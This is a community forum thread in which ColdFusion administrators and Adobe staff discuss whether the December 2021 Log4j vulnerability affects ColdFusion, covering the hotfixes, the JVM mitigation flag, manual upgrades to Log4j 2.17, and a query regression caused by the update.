zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228)

Explorer ,
Dec 10, 2021 Dec 10, 2021

Copy link to clipboard

Copied

Does anyone know if the zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) that was announced on 12/9/2021 will affect ColdFusion version 10 and 2018?

Views

37.2K

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines

correct answers 1 Correct answer

Adobe Employee , Dec 14, 2021 Dec 14, 2021

Hi Everyone,


We had originally published (on Dec 14) some workaround/mitigation steps in this article until the patch would be released. Since then, there have been updates and still further updates.

 

Dec 14: Technote with initial mitigations offered:

https://helpx.adobe.com/coldfusion/kb/log4j-vulnerability-coldfusion.html

 

Update Dec 17: Updates for CF2021 and 2018 were released, addressing this log4j vulnerability. The technote mentioned above was a preliminary response, offered on Dec 14.

...

Likes

Translate

Translate
replies 188 Replies 188
Community Beginner ,
Dec 21, 2021 Dec 21, 2021

Copy link to clipboard

Copied

Is there an update on this specific request to have only this issue addressed? We're experiecing an issue with cumulative patches wehre our QoQ are breaking. Per another post Adobe has a fix for it but we won't have time to test it all.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 17, 2021 Dec 17, 2021

Copy link to clipboard

Copied

I'm still using CF10, which based on this thread seems like it's probably not affected by this exploit. But, if I do add the "-Dlog4j2.formatMsgNoLookups=true" to my java args, will it be a problem?

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

quote

I'm still using CF10, which based on this thread seems like it's probably not affected by this exploit. But, if I do add the "-Dlog4j2.formatMsgNoLookups=true" to my java args, will it be a problem?


By @Whatfore

 

I think it won't be a problem. However, I would suggest that you don't add it. 

 

 It is bad practice to initialize variables that are never used anywhere in your application. The same applies here. After all, -Dlog4j2.formatMsgNoLookups=true is just Java initialization code.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

It appears something else changed besides log4j in the hotfix v3 for 2021

QoQ started returning: java.lang.UnsupportedOperationException: getColumnType() at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:783) at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:773)

 

Query is basic:

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(last_count) AS last_count,
SUM(proj_amount) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 

Adding cast() didn't help either

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(CAST(last_count AS INTEGER)) AS last_count,
SUM(CAST(proj_amount AS DOUBLE)) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

looks like Update 3 removed hotfixes that might have been applied such as hf202100-4212383.jar. Re-installing fixed.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

quote

It appears something else changed besides log4j in the hotfix v3 for 2021

QoQ started returning: java.lang.UnsupportedOperationException: getColumnType() at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:783) at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:773)

 

Query is basic:

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(last_count) AS last_count,
SUM(proj_amount) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 

Adding cast() didn't help either

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(CAST(last_count AS INTEGER)) AS last_count,
SUM(CAST(proj_amount AS DOUBLE)) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 


By @rgjason2

 

If so, please create a bug ticket.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

my developer faced a siialr issue - probably the group by doing it 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

The solution is to to add the jar that was offered for update 2 (and 12, for cf2021).

 

See:

https://tracker.adobe.com/#/view/CF-4212383

 

As the Adobe info (in some pages) on the update says, they did not incorporate ANY current fixes to ANY bugs in update 2 (or 12). They ONLY updated the log4j libraries. 


/Charlie (troubleshooter, carehart.org)

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

@Priyank Shrivastava.  What is happening with extra DoS vulnerability in log4j 2.16? THis has now been updated to 2.17.

 

Will Adobe be updating the hotfix? Should we manually update?

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

Hmm,

 

A quick manual try on a local vbox to 2.17 gives a bunch errors after cf restart.

 

Going back to 2.16 after that, same. Err...

 

 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 19, 2021 Dec 19, 2021

Copy link to clipboard

Copied

 

 

A quick manual try on a local vbox to 2.17 gives a bunch errors after cf restart.

 

By @aarnir71156744

 

Could you please share the error messages you got.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 19, 2021 Dec 19, 2021

Copy link to clipboard

Copied

Sorry, my mistake.I accidently removed log4j.jar too. Now changed to 2.17 and running ok. CF2021 in a Vbox Ubuntu 20.04 LTS test machine with:

log4j-api-2.17.0.jar
log4j-core-2.17.0.jar
log4j-to-slf4j-2.17.0.jar

 

No errors or warnings.

 

Did not do this on the production machine yet though.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

quote

@Priyank Shrivastava.  What is happening with extra DoS vulnerability in log4j 2.16? THis has now been updated to 2.17.

 


By @w49369461

 

Yes, indeed. Even the new log4j 2.16 has been found to be vulnerable. It could enable an attacker to generate infinite recursive lookups, leading to a denial of service.

 

https://logging.apache.org/log4j/2.x/

 

Let's wait for Adobe's solution. In the meantime, I think the JVM flag, 

-Dlog4j2.formatMsgNoLookups=true

 remains an effective preventive measure even against this new vulnerability. Unless, of course, your application requires lookups. 

 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Dec 18, 2021 Dec 18, 2021

Copy link to clipboard

Copied

Hi All,

 

We are looking into this and I will update the thread with more details. 

Thanks,
Priyank Shrivastava

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Explorer ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

Hi Priyank.

After we apply CF 2018 hotfix 13, we still see log4j-1.2.15.jar in the <cfinstance>/lib directory.  When we try to remove it, we get 500 errors.  Will this file be patched or removed?  I am being told this is still a vulnerabilty.

Thank you,
Jeff

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

Hi Jeff,

 

In one of the comments, I clarified that log4j-1.2.15.jar is not vulnerable anymore. We have patched it and it is safe to use. 

 

I understand that it will flag by your scanner, however, with update 3 it is secure. 

 

Also, CF is not impacted by the recent CVE that was fixed in 2.17, however, you can still update the CORE jar to 2.17. 

Thanks,
Priyank Shrivastava

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

[deleted]

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Expert ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

 

Also, CF is not impacted by the recent CVE that was fixed in 2.17, ...


By @Priyank Shrivastava.

 

Hi Priyank,

I beg to disagree. If Log4j v2.16 is susceptible to a denial-of-service vulnerability and ColdFusion is equipped with Log4j v2.16, then ColdFusion will likewise be susceptible. 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

Hi @BKBK 

 

I was also not convinced however, we did analyze it and I am sharing the details based on the team's comment. 

 

Thanks,
Priyank Shrivastava

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

Also, we are asking users to upgrade the CORE library to 2.17. We will share more details in our article. 

 

Thanks,
Priyank Shrivastava

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

I have updated manually to 2.17 both Core and API and there appears to be no issues.

 

 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 20, 2021 Dec 20, 2021

Copy link to clipboard

Copied

Same with production machine now and seems to run just fine. CF2021 Standard, Ubuntu 20.04 Server LTS with:

log4j-api-2.17.0.jar
log4j-core-2.17.0.jar
log4j-to-slf4j-2.17.0.jar

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Dec 21, 2021 Dec 21, 2021

Copy link to clipboard

Copied

Hi All,

 

We have released an article with updated jar 2.17 which you can replace in your server. Here I am sharing the article, please follow it and let me know in case of any issue.

https://helpx.adobe.com/coldfusion/kb/log4j-2-16-vulnerability-coldfusion.html

 

Thanks,
Priyank Shrivastava

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Engaged ,
Dec 21, 2021 Dec 21, 2021

Copy link to clipboard

Copied

It is wonderful that you guys are following and updating these vulnerabilities as they come up.  Kudos for that!  Thank you.  However, it seems the only place these are being socialized is within the comments of this blog post.  These should also be posted to Adobe's Product Security Incident Response Team page I would think.  I see no mention of any of this there.  https://helpx.adobe.com/security.html#coldfusion

I do see that the larger updates (2021 update 3 and 2018 update 13) are posted to the usual ColdFusion updates page. So that's good.  But now you have another "patch" to be applied after the latest updates and I see no mention of that anywhere but here in the comments.

Please update the Adobe site as well with this information for people to find when they look for ColdFusion updates in the future.  The update process with ColdFusion is unnecessarily difficult because we have to look in so many different places to find out what to do.

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Dec 21, 2021 Dec 21, 2021

Copy link to clipboard

Copied

It would also be nice if these security updates would be able to be released without being cumulative.

 

Updating to these hotfixes has required a number of emails to Adobe to get hotfixes for known issues that we cannot test against due to the urgency.

 

 

Likes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines